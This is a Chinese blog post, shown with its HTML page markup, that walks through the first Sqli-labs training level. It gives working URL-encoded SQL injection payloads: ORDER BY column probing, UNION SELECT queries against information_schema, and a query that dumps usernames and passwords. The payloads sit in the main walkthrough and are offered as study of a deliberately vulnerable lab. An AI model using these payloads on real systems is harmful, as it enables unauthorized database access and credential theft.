<!DOCTYPE html>












  


<html class="theme-next pisces use-motion" lang="zh-CN">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2"/>
<meta name="theme-color" content="#222">












<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />






















<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=6.3.0" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=6.3.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=6.3.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=6.3.0">


  <link rel="mask-icon" href="/images/logo.svg?v=6.3.0" color="#222">









<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '6.3.0',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="引言首先从别人的博客上搬运一些注入的常识giantbranch的专栏 url编码：一般的 url 编码其实就是那个字符的ASCII值得十六进制，再在前面加个% 具体可以看W3C上面的解释，这里可以查到每个字符的url编码，当然自己编程或者用该语言应该也有自带的函数，去实现url编码 常用的写出来吧： 空格是%20，单引号是%27， 井号是%23，双引号是%22 判断sql注入（显错和基于错误的盲注">
<meta name="keywords" content="每周一篇原创文章：这是第25周第一篇">
<meta property="og:type" content="article">
<meta property="og:title" content="通过 Sqli-labs-master 学习sql注入（一）">
<meta property="og:url" content="http://yoursite.com/2018/06/23/通过-Sqli-labs-master-学习sql注入（一）/index.html">
<meta property="og:site_name" content="Doint的博客">
<meta property="og:description" content="引言首先从别人的博客上搬运一些注入的常识giantbranch的专栏 url编码：一般的 url 编码其实就是那个字符的ASCII值得十六进制，再在前面加个% 具体可以看W3C上面的解释，这里可以查到每个字符的url编码，当然自己编程或者用该语言应该也有自带的函数，去实现url编码 常用的写出来吧： 空格是%20，单引号是%27， 井号是%23，双引号是%22 判断sql注入（显错和基于错误的盲注">
<meta property="og:locale" content="zh-CN">
<meta property="og:updated_time" content="2018-06-23T09:12:30.895Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="通过 Sqli-labs-master 学习sql注入（一）">
<meta name="twitter:description" content="引言首先从别人的博客上搬运一些注入的常识giantbranch的专栏 url编码：一般的 url 编码其实就是那个字符的ASCII值得十六进制，再在前面加个% 具体可以看W3C上面的解释，这里可以查到每个字符的url编码，当然自己编程或者用该语言应该也有自带的函数，去实现url编码 常用的写出来吧： 空格是%20，单引号是%27， 井号是%23，双引号是%22 判断sql注入（显错和基于错误的盲注">






  <link rel="canonical" href="http://yoursite.com/2018/06/23/通过-Sqli-labs-master-学习sql注入（一）/"/>



<script type="text/javascript" id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>通过 Sqli-labs-master 学习sql注入（一） | Doint的博客</title>
  









  <noscript>
  <style type="text/css">
    .use-motion .motion-element,
    .use-motion .brand,
    .use-motion .menu-item,
    .sidebar-inner,
    .use-motion .post-block,
    .use-motion .pagination,
    .use-motion .comments,
    .use-motion .post-header,
    .use-motion .post-body,
    .use-motion .collection-title { opacity: initial; }

    .use-motion .logo,
    .use-motion .site-title,
    .use-motion .site-subtitle {
      opacity: initial;
      top: initial;
    }

    .use-motion {
      .logo-line-before i { left: initial; }
      .logo-line-after i { right: initial; }
    }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Doint的博客</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">
    <a href="/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-home"></i> <br />首页</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">
    <a href="/archives/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />归档</a>
  </li>

      
      
    </ul>
  

  

  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
            

          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2018/06/23/通过-Sqli-labs-master-学习sql注入（一）/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Doint">
      <meta itemprop="description" content="欢迎来到Doint的博客，这里记录了Doint的成长经历。">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Doint的博客">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">通过 Sqli-labs-master 学习sql注入（一）
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              

              
                
              

              <time title="创建时间：2018-06-23 15:08:20 / 修改时间：17:12:30" itemprop="dateCreated datePublished" datetime="2018-06-23T15:08:20+08:00">2018-06-23</time>
            

            
              

              
            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="引言"><a href="#引言" class="headerlink" title="引言"></a>引言</h2><p>首先从别人的博客上搬运一些注入的常识<a href="https://blog.csdn.net/u012763794/article/details/51207833" target="_blank" rel="noopener">giantbranch的专栏</a></p>
<p><em>url</em>编码：一般的 <em>url</em> 编码其实就是那个字符的ASCII值得十六进制，再在前面加个<code>%</code></p>
<p><a href="http://www.w3school.com.cn/tags/html_ref_urlencode.html" target="_blank" rel="noopener">具体可以看W3C上面的解释</a>，这里可以查到每个字符的url编码，当然自己编程或者用该语言应该也有自带的函数，去实现url编码</p>
<p>常用的写出来吧： 空格是<code>%20</code>，单引号是<code>%27</code>， 井号是<code>%23</code>，双引号是<code>%22</code></p>
<p>判断sql注入（显错和基于错误的盲注）：单引号，<code>and 1=1</code>和and <code>1=2</code>，双引号，反斜杠，注释等</p>
<p>判断基于时间的盲注:在上面的基础上，加个sleep函数 ，如sleep(5) (函数不同数据库有所不同)例子：   <code>&#39; and sleep(5)    &quot; and sleep(5)</code></p>
<p><em>sql</em>注入的基本步骤（这个跟sqlmap的步骤基本一致吧）</p>
<p>判断是什么类型注入，有没过滤了关键字，可否绕过</p>
<p>获取数据库用户，版本，当前连接的数据库等信息</p>
<p>获取某个数据库表的信息</p>
<p>获取列信息</p>
<p>最后就获取数据了</p>
<h2 id="开始"><a href="#开始" class="headerlink" title="开始"></a>开始</h2><p><strong>Less-1 GET - Error based -Single quotes - String(基于错误的GET单引号字符型注入)</strong></p>
<h2 id="寻找注入点-猜字段"><a href="#寻找注入点-猜字段" class="headerlink" title="寻找注入点+猜字段"></a>寻找注入点+猜字段</h2><p>首先加入一个<code>&#39;</code>，页面返回sql语句语法出错，因为没有闭合<code>&#39;</code>导致错误，说明是存在注入的。</p>
<p>然后是猜字段    <code>&quot;?id=1%27order%20by%201,2,3%23&quot;</code></p>
<p><code>order by</code> 的意思是排序，当我加到4的时候页面报错<code>&quot;Unknown column &#39;4&#39; in &#39;order clause&#39;&quot;</code>不存在这个字段，说明只有1，2，3三个字段</p>
<p>然后用    <code>&quot;?id=0%27union%20select%201,2,concat_ws(char(32,58,32),version(),user(),version())%23&quot;</code>    注出版本号，库名，用户名</p>
<p><strong>这里有几个知识点</strong><br>1、id=0是因为id一般是数字，从1开始，当id等于0时候，第一行查询的就成了空集，自然显示第二行的<br>2、查看源码，可以看到函数<em>mysql_fetch_array</em>只被调用了一次，而<em>mysql_fetch_array()</em> 函数从结果集中取得一行作为关联数组，或数字数组，或二者兼有，所以需要使用<em>concat_ws</em>，<a href="https://www.cnblogs.com/xbblogs/p/6066386.html" target="_blank" rel="noopener">这里有网上对于concat_ws的解释。</a></p>
<h2 id="查表名列名"><a href="#查表名列名" class="headerlink" title="查表名列名"></a>查表名列名</h2><p>然后查询<em>security</em>数据库中有哪些表<br>mysql的系统数据库<em>information_schema</em>，系统本身自带的，记录了数据库，表，列，用户权限等信息。</p>
<p><em>SCHEMATA</em>表:储存<em>mysql</em>所有数据库的基本信息</p>
<p><em>TABLES</em>表:储存<em>mysql</em>中的表信息</p>
<p><em>COLUMNS</em>表：提供了表中的列信息</p>
<p>直接查询<em>information_schema</em>表中的信息就能找到表名，列名</p>
<p><code>&quot;id=0%27union%20select%201,2,table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%203,5%23&quot;</code>查到表名是    <code>user</code></p>
<p>根据表名查列名<code>&quot;?id=0%27union%20select%201,2,column_name%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20limit%200,5%23&quot;</code>列名分别是：<em>id、username、password</em></p>
<h2 id="提取用户名密码"><a href="#提取用户名密码" class="headerlink" title="提取用户名密码"></a>提取用户名密码</h2><p>然后select出来就行了<code>&quot;?id=0%27union%20select%201,2,concat_ws(char(32,58,32),id,username,password)%20from%20users%20limit%201,2%23&quot;</code> 结果：<em>Welcome    Dhakkan         Your Login name:2        Your Password:2 : Angelina : I-kill-you</em></p>
<h2 id="最后"><a href="#最后" class="headerlink" title="最后"></a>最后</h2><p>有一个小彩蛋：<em>Angelina : I-kill-you</em>，数据库第二个用户名密码，这个东西以前貌似听别人说过。</p>
<p>sql注入学起来其实也不难，只是静不下心来学，看着别人的解题过程，自己整理了一下，学到了很多，多年来困扰的<em>Sql</em>注入终于起了个头，相信慢慢地自己的进步会越来越快。</p>
<p>以后有时间回头看看这个文章，也算认真写的第一个文章了，相信自己能够坚持下去。</p>
<p>既然要坚持，就学学“涵的硅谷成长笔记”公众号吧，每周一篇原创文章，记录下自己的学习过程。</p>

      
    </div>

    

    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/每周一篇原创文章：这是第25周第一篇/" rel="tag"># 每周一篇原创文章：这是第25周第一篇</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/07/08/简单的linux命令学习/" rel="prev" title="简单的linux命令学习">
                简单的linux命令学习 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Doint</p>
              <p class="site-description motion-element" itemprop="description">欢迎来到Doint的博客，这里记录了Doint的成长经历。</p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">3</span>
                    <span class="site-state-item-name">日志</span>
                  </a>
                </div>
              

              

              
                
                
                <div class="site-state-item site-state-tags">
                  
                    
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">2</span>
                    <span class="site-state-item-name">标签</span>
                  
                </div>
              
            </nav>
          

          

          

          
          

          
          

          
            
          
          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#引言"><span class="nav-number">1.</span> <span class="nav-text">引言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#开始"><span class="nav-number">2.</span> <span class="nav-text">开始</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#寻找注入点-猜字段"><span class="nav-number">3.</span> <span class="nav-text">寻找注入点+猜字段</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#查表名列名"><span class="nav-number">4.</span> <span class="nav-text">查表名列名</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#提取用户名密码"><span class="nav-number">5.</span> <span class="nav-text">提取用户名密码</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#最后"><span class="nav-number">6.</span> <span class="nav-text">最后</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Doint</span>

  

  
</div>




  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动 v3.7.1</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://theme-next.org">NexT.Pisces</a> v6.3.0</div>




        








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=6.3.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=6.3.0"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=6.3.0"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=6.3.0"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=6.3.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=6.3.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=6.3.0"></script>



  



	





  





  










  





  

  

  

  

  
  

  

  

  

  

  

</body>
</html>
